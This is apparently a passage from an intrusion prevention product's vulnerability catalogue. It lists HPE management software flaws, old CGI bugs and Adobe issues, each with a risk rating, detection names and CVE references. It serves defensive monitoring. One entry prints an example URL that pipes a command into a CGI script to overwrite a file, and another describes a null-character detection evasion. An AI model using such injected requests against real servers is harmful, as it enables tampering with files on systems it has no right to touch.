Description: Improper parsing of SSID information in user-sent packets causes a stack buffer overflow vulnerability in HP Intelligent Management Center. A successful attack can allow arbitrary code to be run remotely on the target system without authentication.
Situation: Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow
References:
CVE-2017-5806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5806
Back to top

HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: Improper validation of opcode data causes a buffer overflow vulnerability in HP Intelligent Management Center. A successful attack allows unauthenticated remote code execution with system privileges.
Situation: Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow
References:
CVE-2017-5805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5805
Back to top

HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: A remote, unauthenticated attacker could exploit a directory traversal vulnerability in HPE Intelligent Management Center PLAT, which could lead arbitrary file deletion.
Situation: HTTP_CS-HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal
References:
CVE-2017-12559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12559
Back to top

HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in HPE Intelligent Management Center. Untrusted data is deserialized by perfAccessMgrServlet, which could lead to arbitrary code execution. An unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted packet to the target server.
Situation: File-Binary_HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization
References:
CVE-2017-8962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8962
Back to top

HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: An Expression Language injection vulnerability has been reported in HPE Intelligent Management Center. The vulnerability is due to insufficient validation of the beanName request parameter in perfSelectTask endpoint. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary code under the security context of the SYSTEM user.
Situation: HTTP_CSR-HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection
References:
CVE-2019-5385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5385
Back to top

HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1013-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper validation of HTTP request parameters causes a file upload vulnerability in HP Intelligent Management Center. A successful exploitation can allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload
References:
CVE-2017-8961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8961
Back to top

HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There has been reported an expression language injection vulnerability in HPE Intelligent Management Center. Succesful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection
References:
CVE-2019-5387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5387
Back to top

HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insufficient validation of the pfdrid request parameter in primefaces endpoint causes an expression language injection vulnerability in HP Intelligent Management Center. A successful exploit allows an attacker to run code with system privileges.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection
Back to top

HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-901-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure deserialization of untrusted objects causes a vulnerability in HP Intelligent Management Center. A successful exploit allows an attacker to run arbitray code with system privileges on the target system.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization
References:
CVE-2017-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5792
Back to top

HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There has been reported an expression Language injection vulnerability in HPE Intelligent Management Center. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection
References:
CVE-2019-11943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11943
Back to top

HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure deserialization of untrusted data by the TopoDebugServlet causes a vulnerability in HPE Intelligent Management Center. A successful exploit allows an attacker to execute arbitrary code with on the target system with system privileges.
Situation: File-Binary_HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization
Back to top

HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There exists an authentication bypass vulnerability in HPE Intelligent Management Center.
Situation: HTTP_CSU-HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass
References:
CVE-2017-5791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5791
Back to top

HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There has been reported an expression language injection vulnerability in HPE Intelligent Management Center. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection
References:
CVE-2019-5386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5386
Back to top

HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure serialization of untrusted data causes a vulnerability in HP Intelligent Management Center. A successful exploit can allow an attacker to run arbitrary code on the target system with system privileges.
Situation: HTTP_CS-HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization
References:
CVE-2017-12558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12558
Back to top

HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection

About this vulnerability: A vulnerability in HPE iMC PLAT
Risk: Moderate
First detected in: sgpkg-ips-977-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE iMC PLAT
Type: Input Validation
Description: Insufficient validation of the beanName parameter causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection
References:
CVE-2017-12526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12526
Back to top

HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal

About this vulnerability: A vulnerability in HPE Moonshot Provisioning Manager Appliance
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE Moonshot Provisioning Manager Appliance
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in HPE Moonshot Provisioning Manager Appliance. This vulnerability exists due to missing input validation in the server_response.py script. The vulnerability can be exploited by a remote, unauthenticated attacker.
Situation: HTTP_CRL-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
HTTPS_CS-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
References:
CVE-2017-8977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8977
Back to top

HPE-Network-Automation-Permissionfilter-Authentication-Bypass

About this vulnerability: A vulnerability in HPE Network Automation
Risk: High
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE Network Automation
Type: Input Validation
Description: There exists an authentication bypass vulnerability in HPE Network Automation. A directory traversal inside a specific URL can allow an unauthenticated attacker to bypass authentication making further attacks possible.
Situation: HTTP_CSU-HPE-Network-Automation-Permissionfilter-Authentication-Bypass
References:
CVE-2017-5812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5812
Back to top

HPE-Network-Automation-RPCServlet-Insecure-Deserialization

About this vulnerability: A vulnerability in HPE Network Automation
Risk: High
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HPE Network Automation
Type: Malfunction
Description: There exists an insecure deserialization vulnerability in RPCServlet of HPE Network Automation. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_HPE-Network-Automation-RPCServlet-Insecure-Deserialization
References:
CVE-2016-8511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8511
Back to top

HPE-Network-Automation-SQL-Injection-Remote-Code-Execution

About this vulnerability: HPE Network Automation SQL Injection Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Windows; Solaris
Software: HPE Network Automation
Type: SQL Injection
Description: An SQL Injection Remote Code Execution vulnerability in HPE Network Automation that allows remote attackers to retrieve encryption keys and other information. This could further allow the attacker to send requests with crafted tk parameters CVE-2017-5811.
Situation: HTTP_CSU-HPE-Network-Automation-SQL-Injection-Remote-Code-Execution
References:
CVE-2017-5810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5810
Back to top

HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Operations Orchestration
Risk: Moderate
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE Operations Orchestration
Type: Input Validation
Description: An insecure deserialization vulnerability could be exploited by a remote, unauthenticated attacker to run arbitrary code execution in the context of the SYSTEM.
Situation: HTTP_CS-HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization
References:
CVE-2017-8994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8994
Back to top

HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Operations Orchestration
Risk: Moderate
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE Operations Orchestration
Type: Input Validation
Description: Insecure serialization of user-sent Java objects causes a vulnerability in HPE Operations Orchestration. A successful attack allows an attacker to execute arbitrary code on the target system with the privileges of the affected application.
Situation: HTTP_CS-HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization
References:
CVE-2017-8994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8994
Back to top

HPE-Operations-Orchestration-Insecure-Deserialization

About this vulnerability: A vulnerability in HPE Operations Orchestration
Risk: Moderate
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE Operations Orchestration
Type: Input Validation
Description: Insecure deserialization of untrusted client data results in a vulnerability in HPE Operations Orchestration. With a suitably crafted payload, an attacker can gain the ability to execute arbitrary code on the target system.
Situation: HTTP_CS-HPE-Operations-Orchestration-Insecure-Deserialization
References:
CVE-2016-8519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8519
Back to top

HPE-Smart-Storage-Administrator-Code-Execution

About this vulnerability: A vulnerability in HPE Smart Storage Administrator
Risk: Moderate
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE Smart Storage Administrator
Type: Malfunction
Description: There exists a remote code execution vulnerability in HPE Smart Storage Administrator.
Situation: HTTP_CRL-HPE-Smart-Storage-Administrator-Code-Execution
References:
CVE-2016-8523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8523
Back to top

HPE-Systems-Insight-Manager-Amf-Deserialization-RCE

About this vulnerability: A vulnerability in HPE Systems Insight Manager.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Windows
Software: HPE Systems Insight Manager
Type: Input Validation
Description: A vulnerability in HPE Systems Insight Manager, version 3.2.2, which allows remote attackers to execute arbitrary code due to insufficient input validation during the deserialization process when a POST request is submitted to /simsearch/messagebroker/amfsecure.
Situation: HTTP_CRL-HPE-Systems-Insight-Manager-Amf-Deserialization-RCE
References:
CVE-2020-7200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7200
Back to top

HTML-Empty-Input-Tag

About this vulnerability: HTML Input tag with no parameters
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An input tag with no parameters can be generally considered useless HTML and may indicate attack related behaviour.
Situation: File-Text_HTML-Empty-Input-Tag
Back to top

HTML-In-HTTP-POST

About this vulnerability: HTML was detected in a HTTP POST request
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: HTML was detected in a HTTP POST request. This is not necessarily malicious, but may be unwanted in some environments.
Situation: HTTP_CS-HTML-In-HTTP-POST
Back to top

HTML-Null-Character-Evasion-Method

About this vulnerability: A HTML evasion method
Risk: Low
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: There is an HTML evasion technique that consists of using an excessive number of null characters injected in the middle of an HTML tag. A typical web browser ignores these extra null characters, while a detection device might not.
Situation: HTTP_SS-HTML-Null-Character-Evasion-Method
File-Text_HTML-Null-Character-Evasion-Method
Back to top

HTML-Script-Detector

About this vulnerability: Dummy vulnerability for a fingerprint that detects HTML script blocks
Risk: Low
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: Dummy vulnerability for a fingerprint that detects HTML script blocks.
Situation: HTTP_SS-Encoded-Client-Side-Script
File-Text_Encoded-Client-Side-Script
Back to top

HTML-Tag-Detector

About this vulnerability: Dummy vulnerability for a fingerprint that detects HTML tags
Risk: Low
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Dummy vulnerability for a fingerprint that detects HTML tags.
Situation: HTTP_HTML-Tag-Detector
File-Text_HTML-Tag-Detector
Back to top

HTran-Connection-Bouncer

About this vulnerability: HTran Connection Bouncer
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: HTran Connection Bouncer is malicious tool that redirects network traffic.
Situation: Generic_SS-HTran-Connection-Bouncer-Error-Message
Back to top

HTTP-427BB-HTML-Injection

About this vulnerability: HTML injection vulnerability in 427BB
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: 427BB
Type: Script Injection
Description: 427BB is PHP and MySQL forum for Unix-based operating systems. The software contains multiple remote HTML injection vulnerabilities. A remote attacker can exploit these cross-site vulnerabilities to execute scripts in the victim's Web browser when the injected page is viewed.
Situation: HTTP_CSU-427BB-HTML-Injection
References:
CVE-2005-0629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0629
BID-12693
http://www.securityfocus.com/bid/12693
Back to top

HTTP-A1stats-Cgi-File-Disclosure

About this vulnerability: Directory traversal vulnerability in A1stats CGI scripts
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drummond Miles A1Stats
Type: Directory Traversal
Description: Drummond Miles A1Stats versions downloaded before 24 April 2001 have a directory traversal vulnerability. This allows remote users to read arbitrary files from the server, and to overwrite files writable by the Web server with A1Stats output.
Situation: HTTP_CSU-A1stats-Cgi-File-Disclosure
References:
CVE-2001-0561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0561
BID-2705
http://www.securityfocus.com/bid/2705
Back to top

HTTP-Admbook-Php-Code-Execution

About this vulnerability: Admbook php Code Execution Vulnerability
Risk: High
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Admbook
Type: Code Injection
Description: Admbook is a free php-written guest book that has a php execution vulnerability. A remote attacker can inject php code into the "content-data.php" file and execute the code afterwards to compromise the target system.
Situation: HTTP_CS-Admbook-Php-Code-Execution
References:
CVE-2006-0852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0852
BID-16753
http://www.securityfocus.com/bid/16753
OSVDB-23365
http://www.osvdb.org/23365
Back to top

HTTP-Admentor-Admin-Asp-Vulnerability

About this vulnerability: Admentor admin.asp vulnerability
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Stefan Holmberg Admentor
Type: Malfunction
Description: Admentor has a vulnerability in its login process that allows any user to login as admin. An SQL query is constructed from the user input but the input is not filtered for special characters.
Situation: HTTP_CRL-Admentor-Admin-Asp-Vulnerability
References:
CVE-2002-0308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0308
BID-4152
http://www.securityfocus.com/bid/4152
Back to top

HTTP-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise

About this vulnerability: Adobe Acrobat/Acrobat Reader buffer overflow via null byte in URL
Risk: Moderate
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: Adobe Acrobat/Acrobat Reader's ActiveX component contains a buffer overflow vulnerability. If an existing pdf-file is requested from a web server with a null-byte and a long string appended after the filename, and the web server truncates the request at the null-byte, a buffer overflow takes place in Adobe's ActiveX component. As the web server truncates the request, it will find and return a valid pdf document. The ActiveX component still receives the complete string and overflows a buffer. Arbitrary code execution is possible, and the vulnerability can be triggered by following a malicious link with a vulnerable version of the ActiveX component installed.
Situation: HTTP_CSU-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise
References:
CVE-2004-0629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0629
BID-10947
http://www.securityfocus.com/bid/10947
Back to top

HTTP-Adobe-Acrobat-PDF-BOF

About this vulnerability: Buffer Overflow in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-185-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Cross-site Scripting
Description: There exists a buffer overflow vulnerability in Adobe Reader and Acrobat. The vulnerability is due to insufficient input validation in JavaScript function util.printf. A remote attacker can exploit this vulnerability by enticing the target user to open maliciously constructed files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.
Situation: HTTP_SS-Adobe-Acrobat-PDF-Formatstring
File-PDF_Adobe-Acrobat-PDF-Formatstring
References:
CVE-2008-2992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992
BID-30035
http://www.securityfocus.com/bid/30035
OSVDB-49520
http://www.osvdb.org/49520
Back to top

HTTP-Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting

About this vulnerability: A vulnerability in Adobe Acrobat Reader allows cross site scripting
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in the browser plugin included with Adobe Acrobat Reader. A crafted URI can be used to execute JavaScript code, which allows spoofing of the page origin.
Situation: HTTP_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
File-Text_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
References:
CVE-2007-0045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0045
BID-21858
http://www.securityfocus.com/bid/21858
Back to top

HTTP-Adobe-Download-Manager-Buffer-Overflow

About this vulnerability: Adobe Download Manager HTTP Reply Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Download Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the component responsible for parsing the AOM file format in the Adobe Download Manager application. A remote attacker can exploit this vulnerability to divert the process flow of the affected application to the injected code, causing arbitrary code execution in the context of the currently logged in user.
Situation: HTTP_Adobe-Download-Manager-Buffer-Overflow
File-TextId_Adobe-Download-Manager-Buffer-Overflow
References:
CVE-2006-5856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5856
BID-21453
http://www.securityfocus.com/bid/21453
Back to top

HTTP-Adobe-RoboHelp-Server-SQL-Injection

About this vulnerability: SQL injection vulnerability in Adobe RoboHelp Server
Risk: Moderate
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Systems RoboHelp Server
Type: SQL Injection
Description: There is an SQL injection vulnerability in Adobe RoboHelp Server. An authenticated attacker can exploit this vulnerability by providing malicious values to specific arguments of the Help_Errors.asp and Top_Unanswered_Customer_Questions.asp pages. A successful exploit leads to disclosure of sensitive information, unauthorized data alternation, and loss of data.
Situation: HTTP_CRL-Adobe-RoboHelp-Server-SQL-Injection
References:
CVE-2008-2991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2991
BID-30137
http://www.securityfocus.com/bid/30137
OSVDB-46867
http://www.osvdb.org/46867
Back to top

HTTP-Aglimpse-Cgi-System-Compromise

About this vulnerability: Arbitrary command-execution flaw in WebGlimpses aglimpse script
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebGlimpse
Type: Metacharacter Injection
Description: The aglimpse script in WebGlimpse does not filter the pipe metacharacter from its input. This allows remote attackers to execute arbitrary commands on the system by sending a suitable argument to agimple.
Situation: HTTP_CRL-Aglimpse-Cgi-System-Compromise
References:
CVE-1999-0147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0147
BID-2026
http://www.securityfocus.com/bid/2026
Back to top

HTTP-Aktivate-Catgy-Cross-Site

About this vulnerability: Aktivates catgy.cgi cross site vulnerability
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: Aktivate
Type: Malfunction
Description: Aktivate is vulnerable to cross-site scripting. Remote users can construct a link containing arbitrary script code to Aktivate, and when a user browses the link the script code will be executed. Attackers cam exploit the vulnerability to hijack legimate users' sessions.
References:
CVE-2001-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1212
BID-3714
http://www.securityfocus.com/bid/3714
Back to top

HTTP-Alibaba-Remote-Command-Execution-Vulnerability

About this vulnerability: Alibaba remote command execution vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Software Manufaktur Alibaba
Type: Metacharacter
Description: By inserting a pipe character after the name of the cgi it is possible to run arbitrary commands on the remote server. Example: http://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt This will overwrite file.txt, or any file you specify. The get32.exe program will also allow the injection of code bytes into any executable file.
Situation: HTTP_CS-Alibaba-DOS
HTTP_CRL-Alibaba-Command-Execution
HTTP_CRL-Alibaba-Command-Execution-2
References:
CVE-1999-0885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0885
BID-770
http://www.securityfocus.com/bid/770
Back to top

HTTP-Allaire-ColdFusion-cfcache.map-Disclosure

About this vulnerability: ColdFusion creates temporary files in web root.
Risk: Low
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ColdFusion
Type: Malfunction
Description: Allaire ColdFusion creates temporary files in web root, which discloses potentially sensitive information.
Situation: HTTP_CSU-Allaire-ColdFusion-cfcache.map-Disclosure
References:
CVE-2000-0057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0057
BID-917
http://www.securityfocus.com/bid/917
Back to top

HTTP-Altavista-Query-Cgi-File-Disclosure

About this vulnerability: Altavista Search Intranet query arbitrary file disclosure
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Altavista Search Intranet
Type: Directory Traversal
Description: Altavista Intranet Search has a directory traversal vulnerability that allows remote users to read arbitrary files from the server.
Situation: HTTP_CSU-Altavista-Query-Cgi-File-Disclosure
References:
CVE-2000-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0039
BID-896
http://www.securityfocus.com/bid/896
OSVDB-15
http://www.osvdb.org/15
Back to top

HTTP-Amaya-Sendtemp-Pl-File-Disclosure

About this vulnerability: File disclosure vulnerability in Amaya's sendtemp.pl
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Amaya Web development server
Type: Directory Traversal
Description: The Sendtemp.pl file distributed with the Amaya Web development server from W3.org has a directory-traversal vulnerability. This allows remote attackers to view files from the server that the server process has access to.
Situation: HTTP_CSU-Amaya-Sendtemp-Pl-File-Disclosure
References:
CVE-2001-0272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0272
Back to top

HTTP-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Code-Execution

About this vulnerability: Code execution vulnerability in AOL ICQ
Risk: Moderate
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AOL Instant Messenger
Type: Malfunction
Description: AOL Instant Messenger has a code execution vulnerability. A successful exploitation allows code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called
File-Text_America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called
References:
CVE-2006-5650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5650
BID-20930
http://www.securityfocus.com/bid/20930
OSVDB-30220
http://www.osvdb.org/30220
Back to top

HTTP-An-Httpd-Cgi-System-Compromise

About this vulnerability: AN-HTTPd test CGI system compromise
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: AN-HTTPd
Type: Malfunction
Description: The test CGI scripts distributed with AN-HTTPd 1.20b allow remote attackers to execute commands via shell metacharacters.
References:
CVE-1999-0947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947
BID-762
http://www.securityfocus.com/bid/762
Back to top

HTTP-Anaconda-Directory-Traversal

About this vulnerability: Anaconda Foundation Directory NULL byte vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1638-5242
Platform: Unix
Software: Anaconda Foundation Directory
Type: Directory Traversal
Description: Directory traversal vulnerability in apexec.pl in Anaconda Foundation can be exploited to reveal any file on the system.
References:
CVE-2000-0975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0975
OSVDB-435
http://www.osvdb.org/435
Back to top

HTTP-Anakonda-Clipper-Directory-Traversal

About this vulnerability: Anaconda Clipper Directory Taversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Unix
Software: Anaconda Clipper
Type: Directory Traversal
Description: The Anaconda Clipper is vulnerable to a directory traversal attack allowing the disclosure of any file on the system.
References:
CVE-2001-0593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0593
BID-2512
